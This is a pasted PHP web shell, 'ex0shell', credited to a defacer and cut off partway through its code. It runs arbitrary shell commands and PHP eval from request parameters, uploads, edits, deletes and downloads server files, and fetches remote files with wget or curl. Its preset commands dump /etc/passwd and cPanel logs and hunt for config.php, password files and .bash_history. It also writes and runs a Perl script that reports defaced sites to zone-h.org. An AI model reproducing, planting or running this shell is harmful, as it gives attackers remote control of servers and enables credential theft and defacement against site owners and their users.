ex0shell


SUBMITTED BY: nabz

DATE: Jan. 25, 2017, 4:57 p.m.

FORMAT: Text only

SIZE: 42.6 kB

HITS: 153

  1. <?
  2. /*###########################################
  3. exoshell volume 2.1S
  4. Maked In Turk Edited And Translated By KingDefacer
  5. ###########################################*/
  6. error_reporting(0);
  7. set_magic_quotes_runtime(0);
  8. if(version_compare(phpversion(), '4.1.0') == -1)
  9. {$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;
  10. $_SERVER = &$HTTP_SERVER_VARS;
  11. }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
  12. if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
  13. elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
  14. else{return $requ."?".$link."=".$val;}}
  15. function delm($delmtxt){print"<center><table bgcolor=Black style='border:1px solidDeepSkyBlue ' width=99% height=2%>";print"<tr><td><b><center><font size=3 color=DeepSkyBlue >$delmtxt</td></tr></table></center>";}
  16. function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
  17. $nscmd=htmlspecialchars($scmd);print $nscmd;}
  18. elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
  19. $ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
  20. elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
  21. while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
  22. print $res;}pclose($pcmd);}elseif(!function_exists(popen)){
  23. ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
  24. ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
  25. print htmlspecialchars($pret);}}
  26. function input($type,$name,$value,$size)
  27. {if (empty($value)){print "<input type=$type name=$name size=$size>";}
  28. elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}
  29. elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
  30. else {print "<input type=$type name=$name value=$value size=$size >";}}
  31. function permcol($path){if (is_writable($path)){print "<font color=red>";
  32. callperms($path); print "</font>";}
  33. elseif (!is_readable($path)&&!is_writable($path)){print "<font color=DeepSkyBlue >";
  34. callperms($path); print "</font>";}
  35. else {print "<font color=DeepSkyBlue >";callperms($path);}}
  36. if ($dlink=="dwld"){download($_REQUEST['dwld']);}
  37. function download($dwfile) {$size = filesize($dwfile);
  38. @header("Content-Type: application/force-download;name=$dwfile");
  39. @header("Content-Transfer-Encoding: binary");
  40. @header("Content-Length: $size");
  41. @header("Content-Disposition: attachment; filename=$dwfile");
  42. @header("Expires: 0");
  43. @header("Cache-Control: no-cache, must-revalidate");
  44. @header("Pragma: no-cache");
  45. @readfile($dwfile); exit;}
  46. ?>
  47. <html>
  48. <head><title>ex0shell Shell & Edited By KingDefacer</title></head>
  49. <style>
  50. BODY {font-family:tahoma; SCROLLBAR-BASE-COLOR: DeepSkyBlue ; SCROLLBAR-ARROW-COLOR: red; }
  51. a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}
  52. a:hover{color:red}
  53. input{FONT-WEIGHT:normal;background-color: #000000;font-size: 12px; color: #dadada; font-family: Tahoma; border: 1px solid #666666;height:17}
  54. textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #666666;}
  55. div{font-size:12px;font-family:tahoma;font-weight:normal;color:DeepSkyBlue smoke}
  56. select{background-color: #191919; font-size: 12px; color: #dadada; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style>
  57. <body bgcolor=black text=DeepSkyBlue ><font face="sans ms" size=3>
  58. </body>
  59. </html>
  60. <?
  61. $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
  62. $sf="<form method=post>";$ef="</form>";
  63. $st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
  64. $et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
  65. $c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
  66. $sta="<textarea cols=157 rows=23>";$eta="</textarea>";
  67. $sfnt="<font face=tahoma size=2 color=DeepSkyBlue >";$efnt="</font>";
  68. ################# Ending of common variables ########################
  69. print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<b><center><font face=tahoma color=DeepSkyBlue size=6> ## ex0 shell EDITED BY KingDefacer ##
  70. </font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
  71. print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "<a href=".inclink('dlink', 'home').">Home</a>";
  72. print " - <a href='javascript:history.back()'>Back</a>";
  73. print " - <a target='_blank' href=".inclink('dlink', 'phpinfo').">phpinfo</a>";
  74. if ($dlink=='phpinfo'){print phpinfo();die();}
  75. print " - <a href=".inclink('dlink', 'basepw').">Base64 decode</a>";
  76. print " - <a href=".inclink('dlink', 'urld').">Url decode</a>";
  77. print " - <a href=".inclink('dlink', 'urlen').">Url encode</a>";
  78. print " - <a href=".inclink('dlink', 'mdf').">Md5</a>";
  79. print " - <a href=".inclink('dlink', 'perm')."&scdir=$nscdir>Check permissions</a>";
  80. print " - <a href=".inclink('dlink', 'showsrc')."&scdir=$nscdir>File source</a>";
  81. print " - <a href=".inclink('dlink', 'qindx')."&scdir=$nscdir>Quick index</a>";
  82. print " - <a href=".inclink('dlink', 'zone')."&scdir=$nscdir>Zone-h</a>";
  83. print " - <a href=".inclink('dlink', 'mail')."&scdir=$nscdir>Mail</a>";
  84. print " - <a href=".inclink('dlink', 'cmdhlp')."&scdir=$nscdir>Cmd help</a>";
  85. if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase']));
  86. print "<p>Result is : $sfnt".$cbase."$efnt"; die();}
  87. if ($dlink=="basepw"){ print "<p><b>[ Base64 - Decoder ]</b>";
  88. print $sf;input ("text","ncbase",$ncbase,35);print " ";
  89. input ("submit","","Decode","");print $ef; die();}
  90. if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld']));
  91. print "<p>Result is : $sfnt".$urldc."$efnt"; die();}if ($dlink=='urld'){
  92. print "<p><b>[ Url - Decoder ]</b>"; print $sf;
  93. input ("text","nurld",$nurld,35);print " ";
  94. input ("submit","","Decode","");print $ef; die();}
  95. if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen']))); print "<p>Result is : $sfnt".$urlenc."$efnt"; die();}
  96. if ($dlink=='urlen'){print "<p><b>[ Url - Encoder ]</b>";
  97. print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();}
  98. if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf']));
  99. print "<p>Result is : $sfnt".$mdfe."$efnt"; die();}if ($dlink=='mdf'){
  100. print "<p><b>[ MD5 - Encoder ]</b>";
  101. print $sf;input ("text","nmdf",$nmdf,35);print " ";
  102. input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef;
  103. print "<pre>";print "<p><textarea cols=120 rows=12>";
  104. if (isset($_REQUEST['mfldr'])){callfuncs('find . -type d -perm -2 -ls');
  105. }elseif (isset($_REQUEST['sfldr'])){callfuncs('find ../ -type d -perm -2 -ls');
  106. }print "</textarea>";print "</pre>";die();}
  107. function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){
  108. print "<p><b>[ Sorry, U choosed an empty file or the file not exists ]";die();}
  109. elseif(isset($showsc)&&filesize($showsc) !=="0") {
  110. print "<p><table width=100% height=10% bgcolor=#dadada border=1><tr><td>";
  111. if (!show_source($showsc)||!function_exists('show_source')){print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";die();}print "</td></tr></table>";die();}}if ($dlink=='showsrc'){
  112. print "<p><b>: Choose a php file to view in a color mode, any extension else will appears as usual :";print "<form method=get>";
  113. input ("text","showsc","",35);print " ";
  114. input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Show-src","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));}
  115. if ($dlink=='cmdhlp'){
  116. print "<p><b>: Insert the command below to get help or to know more about it's uses :";print "<form method=get>";
  117. input ("text","hlp","",35);print " ";
  118. input ("submit","","Help","");print $ef; die();}
  119. if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp'];
  120. print "<p><b>[ The command is $sfnt".$hlp."$efnt ]";
  121. $hlp = escapeshellcmd($hlp);print "<p><table width=100% height=30% bgcolor=#dadada border=2><tr><td>";
  122. if (!function_exists(shell_exec)&&!function_exists(exec)&&
  123. !function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
  124. {print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";}else {print "<pre><font color=black>";
  125. if(!callfuncs("man $hlp | col -b")){print "<center><font size=2><b>[ Finished !! ]";}print "</pre></font>";}print "</td></tr></table>";die();}
  126. if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt']))
  127. {if (touch ($_REQUEST['indx'])==true){
  128. $fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt']));
  129. fclose($fp);print "<p>[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]</p>";print "<b><center>[ <a href='javascript:history.back()'>Yeniden Editle</a>
  130. ] -- [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</center></b>";die(); }else {print "<p>[ Sorry, Can't create the index !! ]</p>";die();}}
  131. if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){
  132. print $sf."<br>";print "<p><textarea cols=50 rows=10 name=indxtxt>
  133. Your index contents here</textarea></p>";
  134. input ("text","indx","Index-name",35);print " ";
  135. input ("submit","qindsub","Create","");print $ef;die();}
  136. if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){
  137. $mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];
  138. if (mail($mailto,$subj,$mailtxt)){print "<p>[ Mail sended to $sfnt".$mailto." $efnt successfully ]</p>"; die();}else {print "<p>[ Error, Can't send the mail ]</p>";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die();}
  139. if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){
  140. print $sf."<br>";print "<p><textarea cols=50 rows=10 name=mailtxt>
  141. Your message here</textarea></p>";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " ";
  142. input ("submit","mailsub","Send-mail","");print $ef;die();}
  143. if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);}
  144. function callzone($nscdir){
  145. if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";}
  146. else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";}
  147. fwrite ($fpz,"\$arq = @ARGV[0];
  148. \$grupo = @ARGV[1];
  149. chomp \$grupo;
  150. open(a,\"<\$arq\");
  151. @site = <a>;
  152. close(a);
  153. \$b = scalar(@site);
  154. for(\$a=0;\$a<=\$b;\$a++)
  155. {chomp \$site[\$a];
  156. if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }
  157. print \"[+] Sending \$site[\$a]\n\";
  158. use IO::Socket::INET;
  159. \$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;
  160. print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";
  161. print \$sock \"Accept: */*\r\n\";
  162. print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";
  163. print \$sock \"Accept-Language: pt-br\r\n\";
  164. print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";
  165. print \$sock \"Connection: Keep-Alive\r\n\";
  166. print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";
  167. print \$sock \"Host: old.zone-h.org\r\n\";
  168. print \$sock \"Content-Length: 385\r\n\";
  169. print \$sock \"Pragma: no-cache\r\n\";
  170. print \$sock \"\r\n\";
  171. print \$sock \"notify_defacer=\$grupo&notify_domain=http%3A%2F%2F\$site[\$a]&notify_hackmode=22&notify_reason=5&notify=+OK+\r\n\";
  172. close(\$sock);}");
  173. if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']);
  174. }else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";}$zonet=$_REQUEST['zonet'];
  175. if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
  176. {print "[ Can't complete the operation !! ]";}
  177. else {callfuncs("chmod 777 $zpl;chmod 777 $li");
  178. ob_start();callfuncs("perl $zpl $li $zonet");ob_clean();
  179. print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die();}
  180. }if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){
  181. print $sf."<br>";print "<p><pre><textarea cols=50 rows=10 name=zonetxt>
  182. www.site1.com
  183. www.site2.com
  184. </textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " ";
  185. input ("submit","zonesub","Send","");print $ef;die();}
  186. print "</div></b></center>"; print"</td></tr>";print"</table>";print "<br>";
  187. function inisaf($iniv) { $chkini=ini_get($iniv);
  188. if(($chkini || strtolower($chkini)) !=='on'){print"<font color=green ><b>OFF ( NOT SECURITY )</b></font>";} else{
  189. print"<font color=red><b>Acik ( Guvenli )</b></font>";}}function inifunc($inif){$chkin=ini_get($inif);
  190. if ($chkin==""){print " <font color=red><b>None</b></font>";}
  191. else {$nchkin=wordwrap($chkin,40,"\n", 1);print "<b><font color=DeepSkyBlue >".$nchkin."</font></b>";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);}
  192. elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r');
  193. while (!feof($opop)){ $nval= fgetc($opop);}}
  194. elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){
  195. ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();}
  196. if($nval=$owhich){print"<font color=red><b>ON</b></font>";}
  197. else{print"<font color=DeepSkyBlue ><b>OFF</b></font>";} }
  198. print"<table bgcolor=#191919 style=\"border:2px #dadada solid ;font-size:13px;font-family:tahoma \" width=100% height=%>";
  199. print"<tr><td>"; print"<center><br>";
  200. print"<b>Safe-mode :\t";print inisaf('safe_mode');print "</b>";print"</center>";
  201. if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print "<table bgcolor=#191919 width=100% height=% style='font-size:13px;font-family:tahoma'><tr><td>";
  202. print "<div align=center>"; print"<br><b>Mysql : </b>";
  203. callocmd('which mysql','/usr/bin/mysql');
  204. print"</td>"; print"<td>"; print"<br><b>Perl : </b>";
  205. callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"</td>"; print"<td>"; print"<br><b>Gcc : </b>";
  206. callocmd('which gcc','/usr/bin/gcc'); print"</td>"; print"<td>";
  207. print"<br><b>Curl : </b>"; callocmd('which curl','/usr/bin/curl'); print"</td>"; print"<td>"; print"<br><b>GET : </b>";
  208. callocmd('which GET','/usr/bin/GET');
  209. print"</td>"; print"<td>";print"<br><b>Wget : </b>";
  210. callocmd('which wget','/usr/bin/wget');
  211. print"</td>"; print"<td>"; print"<br><b>Lynx : </b>";
  212. callocmd('which lynx','/usr/bin/lynx');
  213. print"</td>"; print "</tr></table>"; }print "<hr><br>";
  214. print "<b>YOUR IP: ".$REMOTE_ADDR."<br></b>";
  215. print "<b>Server IP : ".$SERVER_ADDR."</b>";
  216. print"<br><b>".$SERVER_SIGNATURE."</b>";
  217. print "<b>Server NAME : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."<br></b>";
  218. print "<b>Disabled Functions : </b>";inifunc(disable_functions);print"<br>";
  219. print "<b>Your Infos : <b>"; callfuncs('id');print"<br><b>Os : </b>";
  220. if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else {
  221. if (!function_exists(shell_exec)&&!function_exists(exec)&&
  222. !function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
  223. {print php_uname(); print "/";print PHP_OS;}
  224. else {callfuncs('uname -a');}}print"<br>";
  225. print"Php-Version : ".phpversion(); print"<br><b>Current-path : </b>";
  226. print $nscdir."&nbsp;&nbsp;&nbsp;&nbsp; [ ";permcol($nscdir);print " ]";
  227. print"<br>";print "Your shells location : " .__file__;
  228. print"<br> Disc Spase: "; readable_size(disk_total_space($nscdir));print " / ";
  229. print"Bos Alan: "; readable_size(disk_free_space($nscdir));
  230. print "</center><br></font>"; print"</td></tr></table><br>";
  231. if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']);
  232. if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; }
  233. else{$mess="Make Dir/ Delete";}}elseif (isset($_REQUEST['deldir']))
  234. { $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}}
  235. else{$mess="Make Dir/ Delete";}if(isset($_REQUEST['crefile'])){
  236. $ncfile=trim($_REQUEST['cfile']);
  237. if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);}
  238. else{ $mess3= "Make a File/ Delete";}}
  239. elseif(isset($_REQUEST['delfile'])){
  240. $ndfile=trim($_REQUEST['cfile']);
  241. if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";}
  242. else {$mess3= "Make Dir/ Delete";}}
  243. else {$mess3="Make a File/ Delete";}
  244. class upload{ function upload($file,$tmp){
  245. $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";}
  246. if (@copy($tmp,$nscdir."/".$file)){
  247. print "<div><center><b>:<font color=DeepSkyBlue > $file </font>uploaded successfully :</b></center></div>"; }else{print "<center><b>: Error uploading<font color=red> $file </font>: </b></center>";} } } }
  248. $obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){
  249. $ustname=trim ($_REQUEST['ustname']);ob_start();
  250. if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);}
  251. if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');}
  252. if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');}
  253. if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');}
  254. if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);}
  255. if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);}
  256. if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);}
  257. if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);}
  258. if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();}
  259. if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&&
  260. !isset($_REQUEST['rfiletxt'])){
  261. if ($dh = dir($nscdir)){ while (true == ($filename =$dh->read())){
  262. $files[] = $filename; sort($files);}print "<br>";
  263. print"<center><table bgcolor=#2A2A2A style=\"border:1px solid black\" width=100% height=6% ></center>";
  264. print "<tr><td width=43% style=\"border:1px solid black\">";
  265. print "<center><b>Files";print "</td>";
  266. print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Size";print "</td>";
  267. print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Write";print "</td>";
  268. print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Read";print "</td>";
  269. print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Type";print "</td>";
  270. print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Edit";print "</td>";
  271. print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Rename";print "</td>";
  272. print "<td width=6% style=\"border:1px solid black\">";print "<center><b>Download";print "</td>";if(strstr(PHP_OS,"Linux")){
  273. print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Owner";print "</td>";}
  274. print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Permission";print "</td></tr>"; foreach ($files as $nfiles){
  275. if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");}
  276. if (is_writable("$nscdir/$nfiles")){
  277. $scmess2= "<center><font color=DeepSkyBlue >yes";}else {$scmess2="<center><font color=red>Hayir";}if (is_readable("$nscdir/$nfiles")){
  278. $scmess3= "<center><font color=DeepSkyBlue >yes";}else {$scmess3= "<center><font color=red>Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "<font color=red><center>Dir";}else{$scmess4= "<center><font color=DeepSkyBlue >File";}
  279. print"<tr><td style=\"border:1px solid black\">";
  280. if (is_dir($nfiles)){print "<font face= tahoma size=2 color=DeepSkyBlue >[ $nfiles ]<br>";}else {print "<font face= tahoma size=2 color=#dadada>$nfiles <br>";}
  281. print"</td>"; print "<td style=\"border:1px solid black\">";
  282. print "<center><font face= tahoma size=2 color=#dadada>";
  283. if (is_dir("$nscdir/$nfiles")){print "<b>K</b>Dir";}
  284. elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";}
  285. print "</td>"; print "<td style=\"border:1px solid black\">";
  286. print "<center><font face= tahoma size=2 >$scmess2"; print "</td>";
  287. print"<td style=\"border:1px solid black\">";
  288. print "<center><font face= tahoma size=2 >$scmess3"; print "</td>";
  289. print "<td style=\"border:1px solid black\">";
  290. print "<center><font face= tahoma size=2 >$scmess4"; print"</td>";
  291. print "<td style=\"border:1px solid black\">";if(is_file("$nscdir/$nfiles")){
  292. print " <center><a href=".inclink('dlink', 'edit')."&edit=$nfiles&scdir=$nscdir>Edit</a>";}else {print "<center><font face=tahoma size=2 color=gray>Düzenle</center>";}print"</td>"; print "<td style=\"border:1px solid black\">";print " <center><a href=".inclink('dlink', 'ren')."&ren=$nfiles&scdir=$nscdir>Rename</a>";print"</td>";print "<td style=\"border:1px solid black\">";
  293. if(is_file("$nscdir/$nfiles")){
  294. print " <center><a href=".inclink('dlink', 'dwld')."&dwld=$nfiles&scdir=$nscdir>Download</a>";}else {print "<center><font face=tahoma size=2 color=gray>indir</center>";}print"</td>"; if(strstr(PHP_OS,"Linux")){
  295. print "<td style=\"border:1px solid black\">";
  296. print "<center><font face=tahoma size=2 color=#dadada>";owgr($nfiles);
  297. print "</center>";print"</td>";}
  298. print "<td style=\"border:1px solid DeepSkyBlue \">";print "<center><div>";
  299. permcol("$nscdir/$nfiles");print "</div>";print"</td>"; print "</tr>";
  300. }print "</table>";print "<br>";}else {print "<div><br><center><b>[ Can't open the Dir, permission denied !! ]<p>";}}
  301. elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){
  302. if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "<div><b><center>[ Executed command ][$] : ".$_REQUEST['cmd']."</div></center>";}
  303. print "<pre><center>".$sta;
  304. if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);}
  305. elseif(isset($_REQUEST['eval'])){
  306. ob_start();eval(stripslashes(trim($_REQUEST['eval'])));
  307. $ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);}
  308. elseif (isset($_REQUEST['subqcmnds'])){
  309. if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');}
  310. if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');}
  311. if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');}
  312. if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');}
  313. if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');}
  314. if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');}
  315. if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');}
  316. if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');}
  317. if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');}
  318. if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');}
  319. if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');}
  320. if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');}
  321. if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');}
  322. }print $eta."</center></pre>";}
  323. function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']);
  324. if(is_readable($rfile)&&is_file($rfile)){
  325. $fp=fopen ($rfile,"r");print"<center>";
  326. print "<div><b>[ Editing <font color=DeepSkyBlue >".basename($rfile)."</font> ] [<a href='javascript:history.back()'> Back </a>] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div><br>";
  327. print $sf."<textarea cols=157 rows=23 name=rfiletxt>";
  328. while (!feof($fp)){$lines = fgetc($fp);
  329. $nlines=htmlspecialchars($lines);print $nlines;}
  330. fclose($fp);print "</textarea>";if (is_writable($rfile)){
  331. print "<center><input type=hidden value=$rfile name=hidrfile><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else
  332. {print "<div><b><center>[ Can't edit <font color=DeepSkyBlue >".basename($rfile)."</font> ]</center></b></div><br>";}print "</center><br>";}
  333. elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "<div><b><center>[ You selected a wrong file name or you don't have access !! ]</center></b></div><br>";}}
  334. function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']);
  335. if (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+");
  336. $rfiletxt=stripslashes($_REQUEST['rfiletxt']);
  337. fwrite ($rffp,$rfiletxt);print "<div><b><center>
  338. [ <font color=DeepSkyBlue >".basename($hidrfile)."</font> Saved !! ]
  339. [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Edit again </a>]
  340. </center></b></div><br>";fclose($rffp);}
  341. else {print "<div><b><center>[ Can't save the file !! ] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Back </a>]</center></b></div><br>";}}
  342. if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);}
  343. elseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);}
  344. function callperms($chkperms){
  345. $perms = fileperms($chkperms);
  346. if (($perms & 0xC000) == 0xC000) {
  347. // Socket
  348. $info = 's';
  349. } elseif (($perms & 0xA000) == 0xA000) {
  350. // Symbolic Link
  351. $info = 'l';
  352. } elseif (($perms & 0x8000) == 0x8000) {
  353. // Regular
  354. $info = '-';
  355. } elseif (($perms & 0x6000) == 0x6000) {
  356. // Block special
  357. $info = 'b';
  358. } elseif (($perms & 0x4000) == 0x4000) {
  359. // Directory
  360. $info = 'd';
  361. } elseif (($perms & 0x2000) == 0x2000) {
  362. // Character special
  363. $info = 'c';
  364. } elseif (($perms & 0x1000) == 0x1000) {
  365. // FIFO pipe
  366. $info = 'p';
  367. } else {
  368. // Unknown
  369. $info = 'u';
  370. }
  371. // Owner
  372. $info .= (($perms & 0x0100) ? 'r' : '-');
  373. $info .= (($perms & 0x0080) ? 'w' : '-');
  374. $info .= (($perms & 0x0040) ?
  375. (($perms & 0x0800) ? 's' : 'x' ) :
  376. (($perms & 0x0800) ? 'S' : '-'));
  377. // Group
  378. $info .= (($perms & 0x0020) ? 'r' : '-');
  379. $info .= (($perms & 0x0010) ? 'w' : '-');
  380. $info .= (($perms & 0x0008) ?
  381. (($perms & 0x0400) ? 's' : 'x' ) :
  382. (($perms & 0x0400) ? 'S' : '-'));
  383. // World
  384. $info .= (($perms & 0x0004) ? 'r' : '-');
  385. $info .= (($perms & 0x0002) ? 'w' : '-');
  386. $info .= (($perms & 0x0001) ?
  387. (($perms & 0x0200) ? 't' : 'x' ) :
  388. (($perms & 0x0200) ? 'T' : '-')); print $info;}
  389. function readable_size($size) {
  390. if ($size < 1024) {
  391. print $size . ' B';
